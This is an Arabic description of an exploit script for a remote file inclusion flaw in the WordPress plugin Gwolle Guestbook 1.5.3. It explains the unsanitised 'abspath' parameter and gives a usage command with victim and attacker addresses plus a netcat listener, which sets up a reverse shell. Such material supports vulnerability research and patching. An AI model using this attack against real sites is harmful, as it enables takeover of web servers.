
إضافة ووردبريس Gwolle Guestbook 1.5.3 - تضمين ملف عن بُعد
يستغل هذا السكريبت المكتوب بلغة بايثون ثغرة خطيرة من نوع تضمين الملفات عن بُعد (Remote File Inclusion - RFI) في إضافة Gwolle Guestbook الخاصة بووردبريس، والتي يمكن استغلالها بواسطة مهاجم غير مصادق لتضمين ملف PHP عن بُعد وتنفيذ كود تعسفي على النظام المعرض للثغرة.
معامل HTTP من نوع GET المُسمى "abspath" لا يتم تطهيره بشكل صحيح قبل استخدامه في دالة PHP require(). يمكن لمهاجم عن بُعد تضمين ملف باسم 'wp-load.php' من خادم بعيد تعسفي وتنفيذ محتواه على خادم الويب المعرض للثغرة. وللقيام بذلك، يحتاج المهاجم إلى وضع ملف خبيث باسم 'wp-load.php' في الدليل الجذر لموقعه على الخادم، وتضمين عنوان URL الخاص بالخادم في الطلب.
يمكن أن يؤدي الاستغلال الناجح لهذه الثغرة إلى اختراق تثبيت ووردبريس بالكامل، وقد يؤدي أيضًا إلى اختراق خادم الويب بأكمله.
يتطلب السكريبت ثلاث وسائط:
مثال:
python3 exploit.py VICTIM_IP/WORDPRESS ATTACKER_IP ATTACKER_PORTملاحظة: يجب أن يكون لديك مستمع netcat مفتوحًا على جهاز المهاجم على المنفذ المحدد.
يُقدم هذا السكريبت لأغراض تعليمية فقط. المؤلف غير مسؤول عن أي أضرار ناتجة عن سوء استخدام هذا السكريبت.